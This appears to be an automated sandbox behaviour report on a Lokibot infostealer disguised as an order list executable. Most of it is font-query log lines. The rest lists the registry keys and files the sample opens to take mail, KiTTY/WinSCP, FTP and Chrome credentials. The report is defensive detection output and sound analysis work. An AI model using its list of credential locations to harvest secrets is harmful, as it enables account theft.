Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ORDER LIST790.exe PID: 980, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ORDER LIST790.exe PID: 1672, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\ORDER LIST790.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\ORDER LIST790.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\ORDER LIST790.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\ORDER LIST790.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Source: Yara match	File source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE
